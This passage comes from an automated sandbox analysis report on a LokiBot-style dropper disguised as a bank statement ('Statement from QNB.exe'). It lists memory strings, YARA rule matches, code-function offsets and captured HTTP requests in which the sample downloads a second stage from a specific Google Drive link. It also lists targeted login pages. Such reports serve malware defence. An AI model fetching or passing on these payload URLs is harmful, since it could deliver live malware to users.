                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/Od
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651025400.0000000000698000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/qr
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/v
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/~
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/:5
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/b5
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleuserco
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/0By
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/F
                    Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/J
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/J4
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/M
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/T
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpq
                    Source: Statement from QNB.exe, 00000004.00000003.80961592797.0000000000875000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNprezy-qH_LiFQvT2qU
                    Source: Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNptsv
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpu
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/~
                    Source: iexplore.exe, 00000011.00000002.81169528331.00000000030FA000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81169483229.00000000030F5000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166049858.0000000003787000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
                    Source: iexplore.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.google.com
                    Source: iexplore.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownDNS traffic detected: queries for: drive.google.com
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-5k-docs.googleusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0k-48-docs.googleusercontent.comCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,14_2_0040BA30

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: Statement from QNB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004017710_2_00401771
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004017240_2_00401724
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004015350_2_00401535
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F3E050_2_022F3E05
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FDA660_2_022FDA66
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_0230697A0_2_0230697A
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FD3820_2_022FD382
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F9E100_2_022F9E10
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02302A7B0_2_02302A7B
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_023030BF0_2_023030BF
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F10DE0_2_022F10DE
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FA5610_2_022FA561
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02304D650_2_02304D65
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FE1B90_2_022FE1B9
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FA1E80_2_022FA1E8
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_004050C214_2_004050C2
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_004014AB14_2_004014AB
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040513314_2_00405133
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_004051A414_2_004051A4
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040124614_2_00401246
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040CA4614_2_0040CA46
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040523514_2_00405235
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_004032C814_2_004032C8
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040168914_2_00401689
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00402F6014_2_00402F60
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE3E0515_2_02BE3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BEDA6615_2_02BEDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BED38215_2_02BED382
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF697A15_2_02BF697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF30BF15_2_02BF30BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE10DE15_2_02BE10DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE9E1015_2_02BE9E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF2A7B15_2_02BF2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BEE1B915_2_02BEE1B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BEA1E815_2_02BEA1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF4D6515_2_02BF4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BEA56115_2_02BEA561
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00404DDB16_2_00404DDB
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_0040BD8A16_2_0040BD8A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00404E4C16_2_00404E4C
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00404EBD16_2_00404EBD
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00404F4E16_2_00404F4E
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0043407F17_2_0043407F
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0043A28417_2_0043A284
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0043E3BA17_2_0043E3BA
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0040440717_2_00404407
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0040450417_2_00404504
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0041286D17_2_0041286D
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00405D0817_2_00405D08
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00414E7117_2_00414E71
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00413E0817_2_00413E08
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0040EE1C17_2_0040EE1C
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00403F7317_2_00403F73
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BDA6621_2_006BDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B3E0521_2_006B3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C697A21_2_006C697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BD38221_2_006BD382
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C2A7B21_2_006C2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B9E1021_2_006B9E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B10DE21_2_006B10DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C30BF21_2_006C30BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C4D6521_2_006C4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BA56121_2_006BA561
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BA1E821_2_006BA1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BE1B921_2_006BE1B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CEDA6622_2_02CEDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE3E0522_2_02CE3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CED38222_2_02CED382
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF697A22_2_02CF697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE10DE22_2_02CE10DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF30BF22_2_02CF30BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF2A7B22_2_02CF2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE9E1022_2_02CE9E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CEA1E822_2_02CEA1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CEE1B922_2_02CEE1B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF4D6522_2_02CF4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CEA56122_2_02CEA561
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056DA6623_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0057697A23_2_0057697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056437923_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056D38223_2_0056D382
